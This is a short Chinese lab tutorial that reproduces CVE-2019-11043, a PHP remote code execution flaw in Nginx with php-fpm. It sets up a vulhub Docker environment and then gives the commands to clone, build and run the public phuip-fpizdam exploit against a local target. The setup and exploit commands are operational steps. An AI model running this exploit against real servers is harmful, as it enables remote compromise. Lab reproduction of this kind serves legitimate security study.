CVE-2019-11043 PHP远程代码执行
该漏洞是某比赛解决一道CTF题目时发现,向目标服务器URL发送%0a符号时,服务返回异常发现的漏洞
2019年9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞,且该配置已被广泛使用,危害较大,影响较为广泛。
漏洞环境:
git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043 //进这个目录里面
docker-compose up -d docker生成环境
打开8080/index.php

等待下载完成
下载成功后
访问

可看到已经搭建完成了
接下来就是一个利用过程了
漏洞利用poc
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go get -v && go build
编译成功后 go run ."http://127.0.0.1:8080/index.php"

本文详细介绍了CVE-2019-11043,一个在Nginx+php-fpm配置下的PHP远程代码执行漏洞。当向服务器URL发送特定字符时,可能导致服务异常并允许攻击者执行任意代码。漏洞利用poc已给出,通过构造特定请求,可以在目标环境中执行任意命令。
最低0.47元/天 解锁文章
994

被折叠的 条评论
为什么被折叠?



